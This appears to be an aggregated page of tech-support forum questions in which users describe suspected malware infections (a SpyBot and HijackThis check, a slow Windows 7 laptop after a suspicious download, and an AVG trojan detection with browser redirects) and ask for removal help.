I finally got SpyBot to run an entire session and removed the only thing it found. Could someone please look at my HJT and tell me if everything is OK before I start entering usernames and passwords again.

I need to pay some bills, but don't won't my information hijacked.

Thanks all. When I am sure this thing is safe I definitely will donate.
 

2 more replies
Answer Match 34.02%

Hello. I have a Windows 7 64bit laptop.
 
I have a strong suspicion that my laptop may be infected with something. All of a sudden it became really slow doing things and it will just completely freeze up. Like for example , trying to search through my files using Windows Explorer or anytime I try using any of my browsers, especially Firefox. Firefox is super slow even when I open it in safe mode. Then my laptop will freeze up to the point where I end up having to just unplug it to shut it off. It also freezes up even when I don't open a browser.
 
This all started 5 or 6 days ago. Unfortunately I think I may have downloaded an infected .rar or .zip file. It was a folder of images (or at least that's what it was supposed to be). The reason I think it was suspicious is because it never did finish downloading.Then, the next day after that, I downloaded and installed a definition update for Windows Defender and then immediately after that is when I first started noticing problems with my Firefox and then all the other problems.
 
I was going to restore my system back to the point before I installed the definition update but then I noticed that my laptop was not saving any restore points. So I tried to fix my pagefile by defragmenting my hard drive.
 
I ran a boot time scan with Avast but I'm still having the same problems. Here are the results of that scan:
 

 
 
----------------------------------------
08/20/2016 00:39
Scan of all local drives... Read more

More replies
Answer Match 34.02%

I have downloaded a file and scanned with panda internet security.
It identified malware in the file but, did not disinfect it.
What I need to do?

Thank you.
 

More replies
Answer Match 34.02%

My System:
Microsoft Windows XP
Professional
Version 2002
Service Pack 3

My Computer:
Intel(R) Core(TM)2 Duo CPU
E6750 @ 2.66GHz
2.66 GHz, 2.00GB of RAM
My problem lies with an AVG scan showing:
"\\?\globalroot\systemroot\system32\gxvxcfwagpmkbgrqntwrkxxrblalqnkxymxdo.dll";"Trojan horse Agent2.GUF";"Infected"

It can't Heal the infection and it's affecting my browsing experience when i click on links. All my browsers run through junk sites before hitting my intended page successfully. Sometimes it's so bad i always land somewhere else or wherever it feels like taking me next.

Occasionally the machine gives up and restarts itself during normal web streaming.

Please Help - i can follow any clear steady instructions swiftly.

Thanks.
 

More replies